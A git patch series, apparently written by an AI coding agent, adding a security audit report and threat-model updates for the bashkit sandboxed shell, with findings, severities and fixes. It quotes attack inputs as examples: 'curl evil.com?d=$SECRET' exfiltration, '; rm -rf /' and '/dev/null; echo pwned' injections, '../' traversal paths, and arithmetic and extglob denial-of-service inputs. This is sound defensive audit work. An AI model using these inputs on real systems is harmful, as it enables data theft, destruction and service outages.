From 0829fecb05e36173ab1c4335abc48f9c1ce5a8cc Mon Sep 17 00:00:00 2001 From: Claude Date: Sun, 1 Mar 2026 01:00:55 +0000 Subject: [PATCH 1/4] docs: comprehensive security audit of bashkit codebase Full manual code review covering parser, interpreter, VFS, builtins, network layer, git support, Python bindings, and tool orchestration. Identified 27 findings (2 critical, 8 high, 10 medium, 7 low) including arithmetic panic/DoS, VFS limit bypass, internal variable namespace injection, process env pollution in jq, and shell injection in Python deepagents wrapper. https://claude.ai/code/session_011wB794wXwA9BMoj1sFKtrE --- SECURITY_AUDIT.md | 370 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 370 insertions(+) create mode 100644 SECURITY_AUDIT.md diff --git a/SECURITY_AUDIT.md b/SECURITY_AUDIT.md new file mode 100644 index 00000000..d11f649e --- /dev/null +++ b/SECURITY_AUDIT.md @@ -0,0 +1,370 @@ +# Bashkit Security Audit Report + +**Date:** 2026-03-01 +**Scope:** Full codebase (Rust core + Python bindings) +**Methodology:** Manual code review of all security-sensitive components + +--- + +## Executive Summary + +Bashkit demonstrates a strong security architecture overall. The virtual filesystem provides genuine isolation, the network allowlist is default-deny, resource limits are comprehensive, and there is zero `unsafe` Rust code. The threat model (`specs/006-threat-model.md`) is thorough and most documented threats are properly mitigated. + +However, this audit identified **27 security findings** across 5 severity levels: + +| Severity | Count | Key Themes | +|----------|-------|------------| +| CRITICAL | 2 | Arithmetic panic/DoS, VFS limit bypass via public API | +| HIGH | 8 | Internal variable namespace injection, parser limit bypass, extglob DoS, process env pollution, shell injection in Python wrappers | +| MEDIUM | 10 | TOCTOU in VFS, tar path traversal, OverlayFs limit inconsistencies, GIL deadlock risk | +| LOW | 7 | PID leak, error message info leaks, integer truncation on 32-bit | + +--- + +## CRITICAL Findings + +### C-1: Integer Overflow / Panic in Arithmetic Exponentiation + +**File:** `crates/bashkit/src/interpreter/mod.rs:7444` + +```rust +return left.pow(right as u32); +``` + +`right` is `i64`. Casting to `u32` silently wraps negatives (e.g., `-1` becomes `4294967295`). Calling `i64::pow()` with a large exponent causes a panic in debug builds or massive CPU hang in release. Even `$(( 2 ** 63 ))` overflows `i64`. + +**Attack:** `$(( 2 ** -1 ))` or `$(( 2 ** 999999999999 ))` crashes or hangs the interpreter. + +**Related:** Shift operators at lines 7343/7353 (`left << right`, `left >> right`) panic if `right >= 64` or `right < 0`. All standard arithmetic (`+`, `-`, `*`) at lines 7379-7407 panics on overflow in debug. Division `i64::MIN / -1` at line 7413 panics (not caught by the `right != 0` check). + +**Fix:** +```rust +// Exponentiation +let exp = right.clamp(0, 63) as u32; +return left.wrapping_pow(exp); + +// Shifts +let shift = right.clamp(0, 63) as u32; +return left.wrapping_shl(shift); + +// All arithmetic: use wrapping_add, wrapping_sub, wrapping_mul +// Division: check left == i64::MIN && right == -1 +``` + +### C-2: `add_file()` and `restore()` Bypass All VFS Limits + +**File:** `crates/bashkit/src/fs/memory.rs:658-698` (add_file), `549-603` (restore) + +`InMemoryFs::add_file()` is a `pub` method that: +- Does NOT call `validate_path()` (no path depth/length/unicode checks) +- Does NOT call `check_write_limits()` (no file size, total bytes, or file count checks) + +Any code with access to `InMemoryFs` (including via `OverlayFs::upper()`) can bypass all filesystem limits. + +Similarly, `restore()` deserializes a `VfsSnapshot` and inserts all entries without any validation or limit checks. + +**Compounding factor:** `OverlayFs::upper()` (line 241) returns `&InMemoryFs` with `FsLimits::unlimited()`, so calling `overlay.upper().add_file(...)` or `overlay.upper().write_file(...)` trivially bypasses all OverlayFs-level limits. + +**Fix:** `add_file()` should call `validate_path()` and `check_write_limits()`. Alternatively, make it `pub(crate)` or document it is only safe during construction. `OverlayFs::upper()` should not be public, or should return a limited view. + +--- + +## HIGH Findings + +### H-1: Internal Variable Namespace Injection + +**File:** `crates/bashkit/src/interpreter/mod.rs` (various locations) + +The interpreter uses magic variable prefixes as internal control signals: +- `_NAMEREF_` (line 7549): nameref resolution +- `_READONLY_` (line 5333): readonly enforcement +- `_SHIFT_COUNT` (line 4255): positional parameter shifting +- `_SET_POSITIONAL` (line 4268): positional parameter replacement +- `_UPPER_`, `_LOWER_` (line 7517): case conversion + +A user script can set these directly: +```bash +_READONLY_PATH="" # Bypass readonly protection +_NAMEREF_x="PATH" # Create unauthorized nameref +_SHIFT_COUNT=100 # Manipulate builtins +``` + +`${!_NAMEREF_*}` (PrefixMatch at line 6034) also exposes all internal variables. + +**Fix:** Use a separate `HashMap` for internal state, or reject user assignments to names starting with `_NAMEREF_`, `_READONLY_`, etc. Filter internal names from `${!prefix*}` results. + +### H-2: Parser Limits Bypassed via `eval`, `source`, Traps, Aliases + +**File:** `crates/bashkit/src/interpreter/mod.rs` + +Multiple code paths create `Parser::new()` which ignores the interpreter's configured limits: +- `source` command (line 4548): `Parser::new(&content)` +- `eval` command (line 4613): `Parser::new(&cmd)` +- Alias expansion (line 3627): `Parser::new(&expanded_cmd)` +- EXIT trap (line 697): `Parser::new(&trap_cmd).parse()` +- ERR trap (line 7795): `Parser::new(&trap_cmd).parse()` + +If the interpreter was configured with stricter `max_ast_depth` or `max_parser_operations`, these paths silently use defaults. + +**Fix:** Use `Parser::with_limits()` everywhere, propagating `self.limits.max_ast_depth` and `self.limits.max_parser_operations`. + +### H-3: Unbounded Recursion in ExtGlob Matching + +**File:** `crates/bashkit/src/interpreter/mod.rs:3043-3092` + +The `+(...)` and `*(...)` extglob handlers recursively call `glob_match_impl` without any depth limit. For each split point in the string, the function recurses with a reconstructed pattern, creating O(n!) time complexity. + +**Attack:** Pattern `+(a|aa)` against a long string of `a`s causes exponential time/stack overflow. + +**Fix:** Add a depth parameter to `glob_match_impl` and `match_extglob`, and bail when exceeded. + +### H-4: Process Environment Pollution in `jq` Builtin (Thread-Unsafe) + +**File:** `crates/bashkit/src/builtins/jq.rs:414-421` + +```rust +std::env::set_var(k, v); // Modifies real process env +``` + +The jq builtin calls `std::env::set_var()` to expose shell variables to jaq's `env` function. This is: +1. **Thread-unsafe:** `set_var` is unsound in multi-threaded contexts (flagged `unsafe` in Rust 2024 edition) +2. **Info leak:** Host process env vars (API keys, tokens) become visible via jaq's `env` +3. **Race condition:** Concurrent jq calls corrupt each other's env state + +**Fix:** Provide a custom `env` implementation to jaq that reads from `ctx.env`/`ctx.variables`, or add a mutex around the env block. + +### H-5: Shell Injection in Python `BashkitBackend` (deepagents.py) + +**File:** `crates/bashkit-python/bashkit/deepagents.py` (lines 187, 198, 206, 230, 258, 278, 302) + +Multiple methods construct shell commands via f-string interpolation of user-supplied paths and content: + +```python +result = self._bash.execute_sync(f"cat {file_path}") # path injection +cmd = f"cat > {file_path} << 'BASHKIT_EOF'\n{content}\nBASHKIT_EOF" # heredoc escape +cmd = f"grep -rn '{pattern}' {path}" # pattern injection +``` + +A path like `"/dev/null; echo pwned > /important/file"` executes injected commands within the VFS. Content containing the literal `BASHKIT_EOF` delimiter terminates the heredoc early, causing remaining text to execute as shell commands. + +**Fix:** Use `shlex.quote()` for all interpolated values, or expose direct VFS methods from Rust that bypass shell parsing. + +### H-6: Heredoc Content Injection in `BashkitBackend.write()` + +**File:** `crates/bashkit-python/bashkit/deepagents.py:198` + +Specific variant of H-5. Content containing `BASHKIT_EOF` on its own line terminates the heredoc. Everything after becomes shell commands within the VFS. + +**Fix:** Use a random delimiter suffix or expose a direct write API. + +### H-7: GIL Deadlock Risk in `execute_sync` + +**File:** `crates/bashkit-python/src/lib.rs:510-527` + +`execute_sync()` calls `rt.block_on()` without releasing the GIL. Inside that, tool callbacks call `Python::attach()` to reacquire the GIL. While PyO3 handles same-thread reentrance, this can deadlock in multi-threaded Python scenarios. + +**Fix:** Wrap `rt.block_on()` with `py.allow_threads(|| { ... })`. + +### H-8: Tokio Runtime Created Per Sync Call (Resource Exhaustion) + +**File:** `crates/bashkit-python/src/lib.rs:237-258, 261-271, 510-527` + +Each `execute_sync()` and `reset()` creates a new `tokio::runtime::Runtime`, spawning OS threads. Under rapid-fire calls (e.g., from an LLM agent loop), this exhausts OS thread/fd limits. + +**Fix:** Use a shared runtime stored in the struct, or use `Builder::new_current_thread()`. + +--- + +## MEDIUM Findings + +### M-1: TOCTOU Race in `InMemoryFs::append_file()` + +**File:** `crates/bashkit/src/fs/memory.rs:816-896` + +`append_file()` reads file state under a read lock, drops it, checks limits with stale data, then acquires a write lock. Another thread can modify the file between locks, making size checks inaccurate. + +**Fix:** Use a single write lock for the entire operation, or re-check size after acquiring the write lock. + +### M-2: Tar Path Traversal Within VFS + +**File:** `crates/bashkit/src/builtins/archive.rs:538, 560` + +Tar entry names like `../../../etc/passwd` are passed to `resolve_path()` which normalizes `..` but still writes to arbitrary VFS locations outside the extraction directory. + +**Fix:** Validate that the resolved path starts with `extract_base`. Reject entries with `..` or leading `/`. + +### M-3: `OverlayFs::chmod` Copy-on-Write Bypasses Limits + +**File:** `crates/bashkit/src/fs/overlay.rs:610-638` + +When `chmod` triggers copy-on-write from the lower layer, it writes directly to `self.upper` (unlimited InMemoryFs), bypassing `OverlayFs::check_write_limits()`. + +### M-4: `OverlayFs` Usage Double-Counts Files + +**File:** `crates/bashkit/src/fs/overlay.rs:246-259` + +`compute_usage()` sums upper + lower layer usage without deducting overwritten or whited-out files. This makes `usage()` inaccurate and can cause premature limit rejections. + +### M-5: `OverlayFs::check_write_limits` Checks Only Upper Layer + +**File:** `crates/bashkit/src/fs/overlay.rs:263-293` + +Total bytes checked against upper layer only. If the lower layer has 80MB and the combined limit is 100MB, the upper layer is allowed another full 100MB (total: 180MB). + +### M-6: Incomplete Recursive Delete Whiteout in `OverlayFs` + +**File:** `crates/bashkit/src/fs/overlay.rs:456-484` + +`rm -r /dir` only whiteouts the directory path, not child files. `is_whiteout()` uses exact path matching, so `/dir/file.txt` remains visible after deleting `/dir`. + +### M-7: Missing Path Validation Across Multiple VFS Methods + +**Files:** `crates/bashkit/src/fs/memory.rs`, `overlay.rs`, `mountable.rs`, `posix.rs` + +`validate_path()` is only called in `read_file`, `write_file`, `append_file`, and `mkdir` within `InMemoryFs`. Missing from: `remove`, `stat`, `read_dir`, `exists`, `rename`, `copy`, `symlink`, `read_link`, `chmod`. + +`copy()` is particularly notable: it creates a new entry without checking write limits, enabling file count and total bytes bypass. + +`PosixFs` and `MountableFs` never call `validate_path()` at all. + +### M-8: `BashTool::create_bash()` Loses Custom Builtins After First Call + +**File:** `crates/bashkit/src/tool.rs:456` + +```rust +for (name, builtin) in std::mem::take(&mut self.builtins) { +``` + +`std::mem::take` empties `self.builtins`. The first `execute()` gets all custom builtins; subsequent calls get none. If custom builtins enforce security wrappers, those are silently removed. + +### M-9: Git Branch Name Path Injection + +**File:** `crates/bashkit/src/git/client.rs:1035, 1080, 1119` + +Branch names are used directly in `Path::join()` without validation. `branch_create(name="../../config")` could overwrite `.git/config` within the VFS. + +**Fix:** Validate branch names against git's ref name rules (no `..`, no control chars, no trailing `.lock`). + +### M-10: `reset()` Discards Security Configuration + +**File:** `crates/bashkit-python/src/lib.rs:260-271` + +`BashTool.reset()` creates a new `Bash` with bare `Bash::builder()`, discarding `max_commands`, `max_loop_iterations`, `username`, and `hostname` configuration. After `reset()`, DoS protections are removed. + +**Fix:** Store original builder config and reapply on reset. + +--- + +## LOW Findings + +### L-1: `$$` Leaks Real Host Process ID + +**File:** `crates/bashkit/src/interpreter/mod.rs:7615` + +```rust +return std::process::id().to_string(); +``` + +Violates sandbox isolation by returning the real OS PID. **Fix:** Return a fixed or random value. + +### L-2: Cyclic Nameref Silently Resolves to Wrong Variable + +**File:** `crates/bashkit/src/interpreter/mod.rs:7547-7560` + +Cyclic namerefs (a->b->a) silently resolve to whatever variable is current after 10 iterations instead of producing an error. + +### L-3: `py_to_json` / `json_to_py` Unbounded Recursion + +**File:** `crates/bashkit-python/src/lib.rs:58-92` + +Deeply nested Python dicts/lists cause stack overflow in the recursive JSON conversion functions. + +**Fix:** Add a depth counter; fail beyond 64 levels. + +### L-4: Error Messages May Leak Internal State + +**Files:** `crates/bashkit/src/error.rs:38` (`Io` wraps `std::io::Error`), `network/client.rs:224` (reqwest errors), `git/client.rs` (VFS paths and remote URLs), `scripted_tool/execute.rs:323` (Debug-formatted errors) + +Internal details (host paths, resolved IPs, TLS info) can leak through error messages. The `scripted_tool` uses `{:?}` (Debug format) while `BashTool` uses `error_kind()` -- inconsistent. + +### L-5: URL Credentials Leaked in Blocked Error Messages + +**File:** `crates/bashkit/src/network/allowlist.rs:144` + +Full URL (including potential `user:pass@` in query strings or authority) is echoed in "URL not in allowlist" errors. + +### L-6: Integer Truncation on 32-bit Platforms + +**Files:** `crates/bashkit/src/network/client.rs:236,419` (`content_length as usize`), `crates/bashkit-python/src/lib.rs:197,200` (`u64 as usize` for limits) + +On 32-bit platforms, large values silently truncate, potentially bypassing size checks. + +### L-7: No Limit on AWK Loop Iterations + +**File:** `crates/bashkit/src/builtins/awk.rs` + +AWK `while`/`for` loops have no iteration limit. `BEGIN { while(1){} }` loops until the bash-level timeout fires (30s default), consuming CPU. + +--- + +## Positive Security Observations + +The following aspects of the security design are well-implemented: + +1. **Zero `unsafe` Rust** across the entire codebase +2. **Virtual filesystem** provides genuine process-level isolation -- no real host FS access +3. **Default-deny network** -- empty allowlist blocks all outbound requests +4. **No auto-redirect following** in HTTP client prevents allowlist bypass +5. **Compression bomb protection** -- auto-decompression disabled, ratio limits on archive extraction +6. **Rust `regex` crate** guarantees linear-time matching (no ReDoS) +7. **Builtin panic recovery** via `catch_unwind` with sanitized error messages +8. **Symlinks not followed** prevents symlink-based escape attacks +9. **HTTPS-only git remotes** with no external process execution +10. **Comprehensive resource limits** with per-`exec()` counter reset +11. **Log redaction** for secrets, URLs, API keys by default +12. **Python (Monty) sandbox** with no `os.system`, `subprocess`, `socket`, or `open()` +13. **Path normalization** consistently applied to collapse `..` traversal +14. **System builtins return virtual values** (hostname, whoami, uname, id) +15. **Fail-point injection testing** infrastructure for systematic security verification + +--- + +## Threat Model Gaps + +The existing threat model (`specs/006-threat-model.md`) does not cover: + +| Gap | Related Findings | +|-----|-----------------| +| Internal variable namespace injection | H-1 | +| Arithmetic overflow/panic | C-1 | +| ExtGlob exponential blowup | H-3 | +| VFS limit bypass via public API (`add_file`, `upper()`) | C-2 | +| Cross-layer limit accounting in OverlayFs | M-3, M-4, M-5 | +| `jq` process env pollution | H-4 | +| Python binding shell injection | H-5, H-6 | +| Parser limit bypass via eval/source/trap | H-2 | + +--- + +## Prioritized Remediation + +### Immediate (blocks production use) +1. **C-1**: Use wrapping/checked arithmetic in all arithmetic operations +2. **H-4**: Stop mutating `std::env` in jq builtin +3. **H-1**: Isolate internal variable namespace from user scripts + +### Short-term (next release) +4. **C-2**: Add limit checks to `add_file()`, restrict `upper()` visibility +5. **H-2**: Propagate parser limits to all `Parser::new()` call sites +6. **H-3**: Add depth limit to extglob matching +7. **H-5/H-6**: Fix shell injection in deepagents.py +8. **M-2**: Validate tar extraction paths stay within target directory +9. **M-8**: Fix `BashTool` custom builtin loss after first execution + +### Medium-term (hardening) +10. **M-1**: Fix TOCTOU in append_file +11. **M-3/M-4/M-5/M-6**: Fix OverlayFs limit accounting and whiteout propagation +12. **M-7**: Add `validate_path()` to all VFS methods +13. **M-9**: Validate git branch names +14. **M-10**: Preserve config on reset() +15. **H-7/H-8**: Fix Python binding GIL handling and runtime management From dae96870f9e4c5441071e11aa87ddd674ec2211c Mon Sep 17 00:00:00 2001 From: Claude Date: Sun, 1 Mar 2026 01:20:27 +0000 Subject: [PATCH 2/4] chore(specs): update threat model with 2026-03 security audit findings Add 15 new threat IDs discovered during comprehensive security audit: - TM-DOS-029 to TM-DOS-033: arithmetic panic, parser bypass, extglob DoS - TM-ESC-012, TM-ESC-013: VFS limit bypass via public API - TM-INF-013 to TM-INF-015: jq env leak, PID leak, URL credential leak - TM-INJ-009, TM-INJ-010: variable namespace injection, tar traversal - TM-ISO-004: cross-tenant env pollution - TM-GIT-014: branch name path injection - TM-PY-023 to TM-PY-025: shell injection, heredoc escape, GIL deadlock Update vulnerability summary, security controls matrix, and public docs. https://claude.ai/code/session_011wB794wXwA9BMoj1sFKtrE --- crates/bashkit/docs/threat-model.md | 12 +++ specs/006-threat-model.md | 145 ++++++++++++++++++++++++++-- 2 files changed, 150 insertions(+), 7 deletions(-) diff --git a/crates/bashkit/docs/threat-model.md b/crates/bashkit/docs/threat-model.md index bca5db6d..61bf2f69 100644 --- a/crates/bashkit/docs/threat-model.md +++ b/crates/bashkit/docs/threat-model.md @@ -37,6 +37,9 @@ through configurable limits. | Filesystem bomb (TM-DOS-007) | Zip bomb extraction | `FsLimits` | [`fs/limits.rs`][fslimits] | | Many files (TM-DOS-006) | Create 1M files | `max_file_count` | [`fs/limits.rs`][fslimits] | | Diff algorithm DoS (TM-DOS-028) | `diff` on large unrelated files | LCS matrix cap (10M cells) | [`builtins/diff.rs`][diff] | +| Arithmetic overflow (TM-DOS-029) | `$(( 2 ** -1 ))` | Use wrapping arithmetic | **OPEN** | +| Parser limit bypass (TM-DOS-030) | eval/source ignore limits | Use `Parser::with_limits()` | **OPEN** | +| ExtGlob blowup (TM-DOS-031) | `+(a\|aa)` exponential | Add depth limit | **OPEN** | **Configuration:** ```rust,ignore @@ -74,6 +77,7 @@ Scripts may attempt to break out of the sandbox to access the host system. | Shell escape (TM-ESC-005) | `exec /bin/bash` | Not implemented | Returns exit 127 | | External commands (TM-ESC-006) | `./malicious` | No external exec | Returns exit 127 | | eval injection (TM-ESC-008) | `eval "$input"` | Sandboxed eval | Only runs builtins | +| VFS limit bypass (TM-ESC-012) | `add_file()` skips limits | Restrict API visibility | **OPEN** | **Virtual Filesystem:** @@ -102,6 +106,8 @@ Scripts may attempt to leak sensitive information. | Env var leak (TM-INF-001) | `echo $SECRET` | Caller responsibility | See below | | Host info (TM-INF-005) | `hostname` | Returns virtual value | [`builtins/system.rs`][system] | | Network exfil (TM-INF-010) | `curl evil.com?d=$SECRET` | Network allowlist | [`network/allowlist.rs`][allowlist] | +| Host env via jq (TM-INF-013) | jq `env` exposes host env | Custom env impl | **OPEN** | +| Real PID leak (TM-INF-014) | `$$` returns real PID | Return virtual value | **OPEN** | **Caller Responsibility (TM-INF-001):** @@ -196,6 +202,8 @@ exfiltration by encoding secrets in subdomains (`curl https://$SECRET.example.co | Command injection (TM-INJ-001) | `$input` containing `; rm -rf /` | Variables expand to strings only | | Path injection (TM-INJ-005) | `../../../../etc/passwd` | Path normalization | | Terminal escapes (TM-INJ-008) | ANSI sequences in output | Caller should sanitize | +| Internal var injection (TM-INJ-009) | Set `_READONLY_X=""` | Isolate internal namespace | **OPEN** | +| Tar path traversal (TM-INJ-010) | `tar -xf` with `../` entries | Validate extract paths | **OPEN** | **Variable Expansion:** @@ -331,6 +339,9 @@ Python `pathlib.Path` operations are bridged to Bashkit's virtual filesystem. | Path traversal (TM-PY-017) | `../../etc/passwd` | VFS path normalization | | Network access (TM-PY-020) | Socket/HTTP | Monty has no socket/network module | | VM crash (TM-PY-022) | Malformed input | Parser depth limit + resource limits | +| Shell injection (TM-PY-023) | deepagents.py f-strings | Use shlex.quote() | **OPEN** | +| Heredoc escape (TM-PY-024) | Content contains delimiter | Random delimiter | **OPEN** | +| GIL deadlock (TM-PY-025) | execute_sync holds GIL | py.allow_threads() | **OPEN** | **Architecture:** @@ -356,6 +367,7 @@ to the virtual filesystem. | Many git objects (TM-GIT-007) | Millions of objects | `max_file_count` FS limit | MITIGATED | | Deep history (TM-GIT-008) | Very long commit log | Log limit parameter | MITIGATED | | Large pack files (TM-GIT-009) | Huge .git/objects/pack | `max_file_size` FS limit | MITIGATED | +| Branch name injection (TM-GIT-014) | `git branch ../../config` | Validate branch names | **OPEN** | | Unauthorized clone (TM-GIT-001) | `git clone evil.com` | Remote URL allowlist | PLANNED (Phase 2) | | Push to unauthorized (TM-GIT-010) | `git push evil.com` | Remote URL allowlist | PLANNED (Phase 2) | diff --git a/specs/006-threat-model.md b/specs/006-threat-model.md index 338df6b9..9f61abd0 100644 --- a/specs/006-threat-model.md +++ b/specs/006-threat-model.md @@ -218,8 +218,27 @@ max_ast_depth: 100, // Parser recursion (TM-DOS-022) | TM-DOS-025 | Regex backtrack | `grep "a](*b)*c" file` | Regex crate limits | Partial | | TM-DOS-027 | Builtin parser recursion | Deeply nested awk/jq expressions | `MAX_AWK_PARSER_DEPTH` (100) + `MAX_JQ_JSON_DEPTH` (100) | **MITIGATED** | | TM-DOS-028 | Diff algorithm DoS | `diff` on two large unrelated files | LCS matrix capped at 10M cells; falls back to simple line-by-line output | **MITIGATED** | +| TM-DOS-029 | Arithmetic overflow/panic | `$(( 2 ** -1 ))`, `$(( 1 << 64 ))`, `i64::MIN / -1` | — | **OPEN** | +| TM-DOS-030 | Parser limit bypass via eval/source/trap | `eval`, `source`, trap handlers, alias expansion create `Parser::new()` ignoring configured limits | — | **OPEN** | +| TM-DOS-031 | ExtGlob exponential blowup | `+(a\|aa)` against long string causes O(n!) recursion in `glob_match_impl` | — | **OPEN** | +| TM-DOS-032 | Tokio runtime exhaustion (Python) | Rapid `execute_sync()` calls each create new tokio runtime, exhausting OS threads | — | **OPEN** | +| TM-DOS-033 | AWK unbounded loops | `BEGIN { while(1){} }` has no iteration limit in AWK interpreter | Timeout (30s) backstop | **PARTIAL** | -**Current Risk**: LOW - Parser timeout, fuel model, and depth limits prevent hangs and stack overflow +**Current Risk**: MEDIUM - Three open DoS vectors (TM-DOS-029, TM-DOS-030, TM-DOS-031) need remediation + +**TM-DOS-029**: Arithmetic exponentiation casts `i64` to `u32` (`right as u32`), wrapping negatives. +`i64::pow()` with large exponent panics or hangs. Shift operators panic if `right >= 64` or `right < 0`. +`i64::MIN / -1` panics. All arithmetic panics in debug on overflow. +Fix: use `wrapping_*` operations and clamp shift/exponent ranges. + +**TM-DOS-030**: `eval` (line 4613), `source` (line 4548), trap handlers (lines 697, 7795), and alias +expansion (line 3627) all use `Parser::new()` which ignores configured `max_ast_depth` and +`max_parser_operations`. Previously fixed for command substitution (TM-DOS-021) but not these paths. +Fix: use `Parser::with_limits()` everywhere. + +**TM-DOS-031**: ExtGlob `+(...)` and `*(...)` handlers recurse without depth limit. Pattern +`+(a|aa)` against `"aaaa..."` creates exponential backtracking via nested `glob_match_impl` calls. +Fix: add depth parameter to `glob_match_impl`, bail when exceeded. **Implementation**: `limits.rs`, `builtins/awk.rs`, `builtins/jq.rs`, `builtins/diff.rs` ```rust @@ -246,12 +265,23 @@ max_parser_operations: 100_000, // Parser fuel (TM-DOS-024) | TM-ESC-003 | Real FS access | Direct syscalls | No real FS by default | **MITIGATED** | | TM-ESC-004 | Mount escape | Mount real paths | MountableFs controlled | **MITIGATED** | -**Current Risk**: LOW - Virtual filesystem provides strong isolation +**Current Risk**: MEDIUM - Two open escape vectors (TM-ESC-012, TM-ESC-013) need remediation **Implementation**: `fs/memory.rs` - `normalize_path()` function - Collapses `..` components at path boundaries - Ensures all paths stay within virtual root +| TM-ESC-012 | VFS limit bypass via public API | `add_file()` / `restore()` skip `validate_path()` and `check_write_limits()` | — | **OPEN** | +| TM-ESC-013 | OverlayFs upper() exposes unlimited FS | `OverlayFs::upper()` returns `InMemoryFs` with `FsLimits::unlimited()` | — | **OPEN** | + +**TM-ESC-012**: `InMemoryFs::add_file()` is `pub` and does not call `validate_path()` or +`check_write_limits()`. `restore()` deserializes without validation. Any code with `InMemoryFs` +access can bypass all limits. Fix: add limit checks or restrict visibility to `pub(crate)`. + +**TM-ESC-013**: `OverlayFs::upper()` returns `&InMemoryFs` with unlimited limits. Callers can +write unlimited data via `overlay.upper().write_file()`. Fix: don't expose `upper()` publicly, +or return a view that enforces the overlay's limits. + #### 2.2 Process Escape | ID | Threat | Attack Vector | Mitigation | Status | @@ -310,7 +340,22 @@ All execution stays within the virtual interpreter — no OS subprocess is spawn | TM-INF-003 | Proc secrets | `/proc/self/environ` | No /proc filesystem | **MITIGATED** | | TM-INF-004 | Memory dump | Core dumps | No crash dumps | **MITIGATED** | -**Current Risk**: MEDIUM - Caller must sanitize environment variables +| TM-INF-013 | Host env leak via jq | jq builtin calls `std::env::set_var()`, exposing host process env vars | — | **OPEN** | +| TM-INF-014 | Real PID leak via $$ | `$$` returns `std::process::id()` instead of virtual value | — | **OPEN** | +| TM-INF-015 | URL credentials in errors | Allowlist "blocked" error echoes full URL including credentials | — | **OPEN** | + +**TM-INF-013**: The jq builtin (`builtins/jq.rs:414-421`) calls `std::env::set_var()` to expose +shell variables to jaq's `env` function. This also makes host process env vars (API keys, tokens) +visible. Additionally, `set_var` is thread-unsafe (unsound in Rust 2024 edition). Fix: provide +custom `env` impl to jaq reading from `ctx.env`/`ctx.variables`. + +**TM-INF-014**: `$$` (`interpreter/mod.rs:7615`) returns `std::process::id()`, leaking the real +host PID. All other system builtins return virtual values. Fix: return fixed or random value. + +**TM-INF-015**: `network/allowlist.rs:144` echoes full URL in error messages, potentially including +`user:pass@` in the authority. Fix: apply `LogConfig::redact_url()` to URLs in errors. + +**Current Risk**: MEDIUM - Caller must sanitize environment variables; jq leaks host env **Caller Responsibility** (TM-INF-001): Do NOT pass sensitive env vars: ```rust @@ -373,7 +418,16 @@ Bash::builder() | TM-INJ-002 | Backtick injection | `` `$malicious` `` | Parsed as command sub | **MITIGATED** | | TM-INJ-003 | eval bypass | `eval $user_input` | eval sandboxed (builtins only) | **MITIGATED** | -**Current Risk**: LOW - Bash's quoting rules apply, variables expand to strings only +**Current Risk**: MEDIUM - Internal variable namespace injection (TM-INJ-009) needs remediation + +| TM-INJ-009 | Internal variable namespace injection | Set `_NAMEREF_`, `_READONLY_`, etc. directly | — | **OPEN** | + +**TM-INJ-009**: The interpreter uses magic variable prefixes as internal control signals: +`_NAMEREF_` (nameref), `_READONLY_` (readonly), `_SHIFT_COUNT`, `_SET_POSITIONAL`, +`_UPPER_`, `_LOWER_`. User scripts can set these directly to bypass readonly +protection, create unauthorized namerefs, or manipulate builtins. `${!_NAMEREF_*}` also exposes +all internal variables. Fix: use separate `HashMap` for internal state, or reject assignments +to reserved prefixes. **Example**: ```bash @@ -390,8 +444,14 @@ echo $user_input | TM-INJ-004 | Null byte | `cat "file\x00/../etc/passwd"` | Rust strings no nulls | **MITIGATED** | | TM-INJ-005 | Path traversal | `../../../../etc/passwd` | Path normalization | **MITIGATED** | | TM-INJ-006 | Encoding bypass | URL/unicode encoding | PathBuf handles | **MITIGATED** | +| TM-INJ-010 | Tar path traversal within VFS | `tar -xf` with `../../../etc/passwd` entry names | — | **OPEN** | + +**TM-INJ-010**: Tar entry names like `../../../etc/passwd` pass through `resolve_path()` which +normalizes `..` but can write to arbitrary VFS locations outside the extraction directory. A +crafted tar can overwrite any file in the VFS. Fix: validate resolved paths stay within +`extract_base`; reject entries with `..` or leading `/`. -**Current Risk**: NONE - Rust's type system prevents these attacks +**Current Risk**: LOW - Rust's type system prevents most attacks; tar traversal is VFS-contained #### 4.3 XSS-like Issues @@ -618,7 +678,13 @@ Only exact domain matches are allowed (TM-NET-017). | TM-ISO-002 | Shared memory | Read other tenant data | Rust memory safety | **MITIGATED** | | TM-ISO-003 | Resource starvation | One tenant exhausts limits | Per-instance limits | **MITIGATED** | -**Current Risk**: LOW - Each Bash instance is fully isolated +| TM-ISO-004 | Cross-tenant env pollution via jq | `std::env::set_var()` in jq modifies process-wide env, visible to concurrent tenants | — | **OPEN** | + +**TM-ISO-004**: The jq builtin's `std::env::set_var()` call (also tracked as TM-INF-013) is a +process-global mutation. Concurrent jq invocations across tenants corrupt each other's environment. +Fix: same as TM-INF-013 — avoid mutating process env. + +**Current Risk**: MEDIUM - jq process env mutation breaks isolation between concurrent tenants **Implementation**: Each tenant gets separate instance with isolated state: ```rust @@ -739,7 +805,14 @@ let config = format!( | TM-GIT-012 | SSH key access | Use host SSH keys | HTTPS only (no SSH) | **PLANNED** | | TM-GIT-013 | Git protocol bypass | Use git:// protocol | HTTPS only | **PLANNED** | -**Current Risk**: N/A - Remote operations not yet implemented (Phase 2) +| TM-GIT-014 | Branch name path injection | `branch_create(name="../../config")` overwrites `.git/config` via `Path::join()` | — | **OPEN** | + +**TM-GIT-014**: Branch names are used directly in `Path::join()` (`git/client.rs:1035, 1080, 1119`) +without validation. A name like `../../config` can overwrite `.git/config` within the VFS. While +confined to VFS, this can corrupt the virtual git repository. Fix: validate branch names against +git's ref name rules (no `..`, no control chars, no trailing `.lock`). + +**Current Risk**: LOW for remote ops (not yet implemented); MEDIUM for local git name injection --- @@ -852,12 +925,38 @@ This section maps former vulnerability IDs to the new threat ID scheme and track | V6 | TM-DOS-021 | Command sub parser limit bypass | **MITIGATED** via inherited depth/fuel | | V7 | TM-DOS-026 | Arithmetic recursion overflow | **MITIGATED** via `MAX_ARITHMETIC_DEPTH` (50) | +### Open (Critical - Blocks Production) + +| Threat ID | Vulnerability | Impact | Recommendation | +|-----------|---------------|--------|----------------| +| TM-DOS-029 | Arithmetic overflow/panic | Interpreter crash/hang | Use wrapping arithmetic, clamp shift/exponent | +| TM-ESC-012 | VFS limit bypass via add_file()/restore() | Unlimited VFS writes | Add limit checks or restrict visibility | +| TM-INF-013 | Host env leak + thread-unsafe set_var in jq | Info leak + data race | Custom env impl for jaq | +| TM-INJ-009 | Internal variable namespace injection | Bypass readonly, manipulate interpreter | Separate internal state HashMap | + +### Open (High Priority) + +| Threat ID | Vulnerability | Impact | Recommendation | +|-----------|---------------|--------|----------------| +| TM-DOS-030 | Parser limit bypass via eval/source/trap | Unlimited parser depth/operations | Use `Parser::with_limits()` everywhere | +| TM-DOS-031 | ExtGlob exponential blowup | CPU exhaustion / stack overflow | Add depth limit to glob_match_impl | +| TM-DOS-032 | Tokio 